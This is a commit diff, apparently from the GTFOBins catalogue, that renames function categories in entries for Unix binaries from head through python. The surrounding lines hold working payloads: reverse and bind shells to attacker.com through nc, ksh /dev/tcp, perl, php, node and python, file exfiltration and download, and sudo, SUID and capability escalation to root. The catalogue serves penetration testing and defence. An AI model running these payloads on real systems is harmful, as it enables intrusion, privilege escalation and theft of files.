head -c1G "$LFILE" head -c1G "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./head -c1G "$LFILE" ./head -c1G "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo head -c1G "$LFILE" sudo head -c1G "$LFILE"

6
_gtfobins/ionice.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid:
- code: ./ionice /bin/sh -p - code: ./ionice /bin/sh -p
sudo-enabled: sudo:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---

4
_gtfobins/journalctl.md
View File

@@ -4,11 +4,11 @@ description: |
This might not work if run by unprivileged users depending on the system configuration. This might not work if run by unprivileged users depending on the system configuration.
functions: functions:
execute-interactive: shell:
- code: | - code: |
journalctl journalctl
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo journalctl sudo journalctl
!/bin/sh !/bin/sh

4
_gtfobins/jq.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
jq -Rr . "$LFILE" jq -Rr . "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./jq -Rr . "$LFILE" ./jq -Rr . "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo jq -Rr . "$LFILE" sudo jq -Rr . "$LFILE"

12
_gtfobins/ksh.md
View File

@@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ksh - code: ksh
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -49,8 +49,8 @@ functions:
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid:
- code: ./ksh -p - code: ./ksh -p
sudo-enabled: sudo:
- code: sudo ksh - code: sudo ksh
--- ---

6
_gtfobins/ld.so.md
View File

@@ -7,10 +7,10 @@ description: |
/lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
``` ```
functions: functions:
execute-interactive: shell:
- code: /lib/ld.so /bin/sh - code: /lib/ld.so /bin/sh
suid-enabled: suid:
- code: ./ld.so /bin/sh -p - code: ./ld.so /bin/sh -p
sudo-enabled: sudo:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---

6
_gtfobins/less.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
less /etc/profile less /etc/profile
!/bin/sh !/bin/sh
@@ -14,10 +14,10 @@ functions:
echo DATA | less echo DATA | less
sfile_to_write sfile_to_write
q q
sudo-enabled: sudo:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile
!/bin/sh !/bin/sh
suid-enabled: suid:
- code: ./less file_to_read - code: ./less file_to_read
--- ---

4
_gtfobins/ltrace.md
View File

@@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ltrace -b -L /bin/sh - code: ltrace -b -L /bin/sh
sudo-enabled: sudo:
- code: sudo ltrace -b -L /bin/sh - code: sudo ltrace -b -L /bin/sh
--- ---

14
_gtfobins/lua.md
View File

@@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: lua -e 'os.execute("/bin/sh")' - code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -15,7 +15,7 @@ functions:
local b=assert(f:read("*a"));t:send(b); local b=assert(f:read("*a"));t:send(b);
end; end;
f:close();t:close();' f:close();t:close();'
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed. - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
code: | code: |
export LPORT=12345 export LPORT=12345
@@ -26,7 +26,7 @@ functions:
local r,x=c:receive();local f=assert(io.popen(r,"r")); local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b); local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' end;c:close();f:close();'
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@@ -41,7 +41,7 @@ functions:
t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d); t:send(d);
t:close();' t:close();'
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed. < "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
code: | code: |
@@ -59,8 +59,8 @@ functions:
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
file-read: file-read:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
sudo-enabled: sudo:
- code: sudo lua -e 'os.execute("/bin/sh")' - code: sudo lua -e 'os.execute("/bin/sh")'
suid-limited: limited-suid:
- code: ./lua -e 'os.execute("/bin/sh")' - code: ./lua -e 'os.execute("/bin/sh")'
--- ---

4
_gtfobins/mail.md
View File

@@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF echo "From nobody@localhost $(date)" > $TF
mail -f $TF mail -f $TF
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- description: This creates a valid Mbox file which may be required by the binary. - description: This creates a valid Mbox file which may be required by the binary.
code: | code: |
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/make.md
View File

@@ -1,7 +1,7 @@
--- ---
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: shell:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
make -s --eval=$'x:\n\t-'"$COMMAND" make -s --eval=$'x:\n\t-'"$COMMAND"
@@ -10,11 +10,11 @@ functions:
code: | code: |
LFILE=file_to_write LFILE=file_to_write
make -s --eval="\$(file >$LFILE,DATA)" . make -s --eval="\$(file >$LFILE,DATA)" .
suid-enabled: suid:
- code: | - code: |
COMMAND='/bin/sh -p' COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND" ./make -s --eval=$'x:\n\t-'"$COMMAND"
sudo-enabled: sudo:
- code: | - code: |
COMMAND='/bin/sh' COMMAND='/bin/sh'
sudo make -s --eval=$'x:\n\t-'"$COMMAND" sudo make -s --eval=$'x:\n\t-'"$COMMAND"

6
_gtfobins/man.md
View File

@@ -1,16 +1,16 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: man file_to_read - code: man file_to_read
sudo-enabled: sudo:
- code: | - code: |
sudo man man sudo man man
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- code: | - code: |
./man man ./man man
!/bin/sh !/bin/sh

6
_gtfobins/more.md
View File

@@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: more file_to_read - code: more file_to_read
suid-enabled: suid:
- code: ./more file_to_read - code: ./more file_to_read
sudo-enabled: sudo:
- code: | - code: |
TERM= sudo -E more /etc/profile TERM= sudo -E more /etc/profile
!/bin/sh !/bin/sh

2
_gtfobins/mount.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
sudo-enabled: sudo:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: | code: |
sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount

4
_gtfobins/mv.md
View File

@@ -1,13 +1,13 @@
--- ---
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges. description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo "DATA" > $TF echo "DATA" > $TF
./mv $TF $LFILE ./mv $TF $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/mysql.md
View File

@@ -1,10 +1,10 @@
--- ---
description: A valid MySQL server must be available. description: A valid MySQL server must be available.
functions: functions:
execute-interactive: shell:
- code: mysql -e '\! /bin/sh' - code: mysql -e '\! /bin/sh'
sudo-enabled: sudo:
- code: sudo mysql -e '\! /bin/sh' - code: sudo mysql -e '\! /bin/sh'
suid-limited: limited-suid:
- code: ./mysql -e '\! /bin/sh' - code: ./mysql -e '\! /bin/sh'
--- ---

6
_gtfobins/nano.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF
@@ -14,14 +14,14 @@ functions:
^O ^O
file-read: file-read:
- code: nano file_to_read - code: nano file_to_read
suid-enabled: suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh -p' > $TF echo 'exec sh -p' > $TF
chmod +x $TF chmod +x $TF
./nano -s $TF /etc/hosts ./nano -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF

12
_gtfobins/nc.md
View File

@@ -1,36 +1,36 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
nc -e /bin/sh $RHOST $RPORT nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive: bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional. - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
code: | code: |
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE" nc $RHOST $RPORT < "$LFILE"
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=file_to_save LFILE=file_to_save
nc -l -p $LPORT > "$LFILE" nc -l -p $LPORT > "$LFILE"
sudo-enabled: sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo nc -e /bin/sh $RHOST $RPORT sudo nc -e /bin/sh $RHOST $RPORT
suid-limited: limited-suid:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/nice.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: nice /bin/sh - code: nice /bin/sh
suid-enabled: suid:
- code: ./nice /bin/sh -p - code: ./nice /bin/sh -p
sudo-enabled: sudo:
- code: sudo nice /bin/sh - code: sudo nice /bin/sh
--- ---

4
_gtfobins/nl.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
nl -bn -w1 -s '' $LFILE nl -bn -w1 -s '' $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE ./nl -bn -w1 -s '' $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE sudo nl -bn -w1 -s '' $LFILE

14
_gtfobins/nmap.md
View File

@@ -1,12 +1,12 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF nmap --script=$TF
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions:
end; end;
f:close();t:close();' > $TF f:close();t:close();' > $TF
nmap --script=$TF nmap --script=$TF
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
@@ -34,7 +34,7 @@ functions:
local b=assert(f:read("*a"));c:send(b); local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF end;c:close();f:close();' > $TF
nmap --script=$TF nmap --script=$TF
upload: file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -50,7 +50,7 @@ functions:
t:send(d); t:send(d);
t:close();' > $TF t:close();' > $TF
nmap --script=$TF nmap --script=$TF
download: file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. < "file_to_send"` on the attacker box to send the file.
code: | code: |
@@ -76,13 +76,13 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
sudo-enabled: sudo:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF sudo nmap --script=$TF
suid-limited: limited-suid:
- description: Input echo is disabled. - description: Input echo is disabled.
code: | code: |
TF=$(mktemp) TF=$(mktemp)

12
_gtfobins/node.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -14,7 +14,7 @@ functions:
sh.stdout.pipe(this); sh.stdout.pipe(this);
sh.stderr.pipe(this); sh.stderr.pipe(this);
});' });'
bind-shell-interactive: bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
@@ -24,13 +24,13 @@ functions:
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid:
- code: | - code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
sudo-enabled: sudo:
- code: | - code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
capabilities-enabled: capabilities:
- code: | - code: |
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
--- ---

4
_gtfobins/od.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
od -An -c -w9999 "$LFILE" od -An -c -w9999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./od -An -c -w9999 "$LFILE" ./od -An -c -w9999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE" sudo od -An -c -w9999 "$LFILE"

10
_gtfobins/perl.md
View File

@@ -1,17 +1,17 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: perl -e 'exec "/bin/sh";' - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled: suid:
- code: ./perl -e 'exec "/bin/sh";' - code: ./perl -e 'exec "/bin/sh";'
sudo-enabled: sudo:
- code: sudo perl -e 'exec "/bin/sh";' - code: sudo perl -e 'exec "/bin/sh";'
capabilities-enabled: capabilities:
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
--- ---

6
_gtfobins/pg.md
View File

@@ -1,15 +1,15 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
pg /etc/profile pg /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: pg file_to_read - code: pg file_to_read
sudo-enabled: sudo:
- code: | - code: |
sudo pg /etc/profile sudo pg /etc/profile
!/bin/sh !/bin/sh
suid-enabled: suid:
- code: ./pg file_to_read - code: ./pg file_to_read
--- ---

16
_gtfobins/php.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'system(getenv("CMD"));' php -r 'system(getenv("CMD"));'
@@ -16,37 +16,37 @@ functions:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive: command:
- code: | - code: |
export CMD="id" export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
code: | code: |
LHOST=0.0.0.0 LHOST=0.0.0.0
LPORT=8888 LPORT=8888
php -S $LHOST:$LPORT php -S $LHOST:$LPORT
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled: suid:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "system('$CMD');" ./php -r "system('$CMD');"
sudo-enabled: sudo:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
sudo php -r "system('$CMD');" sudo php -r "system('$CMD');"
capabilities-enabled: capabilities:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');" ./php -r "posix_setuid(0); system('$CMD');"

6
_gtfobins/pico.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF
@@ -14,14 +14,14 @@ functions:
^O ^O
file-read: file-read:
- code: pico file_to_read - code: pico file_to_read
suid-enabled: suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh -p' > $TF echo 'exec sh -p' > $TF
chmod +x $TF chmod +x $TF
./pico -s $TF /etc/hosts ./pico -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'exec sh' > $TF echo 'exec sh' > $TF

12
_gtfobins/pip.md
View File

@@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF pip install $TF
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF pip install $TF
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF pip install $TF
download: file-download:
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path. - description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@@ -60,12 +60,12 @@ functions:
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
pip install $TF pip install $TF
load-library: library-load:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
pip install $TF pip install $TF
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

4
_gtfobins/puppet.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
file-write: file-write:
@@ -13,7 +13,7 @@ functions:
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE puppet filebucket -l diff /dev/null $LFILE
sudo-enabled: sudo:
- code: | - code: |
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
--- ---

16
_gtfobins/python.md
View File

@@ -1,9 +1,9 @@
--- ---
description: The payloads are compatible with both Python version 2 and 3. description: The payloads are compatible with both Python version 2 and 3.
functions: functions:
execute-interactive: shell:
- code: python -c 'import os; os.system("/bin/sh")' - code: python -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -12,7 +12,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
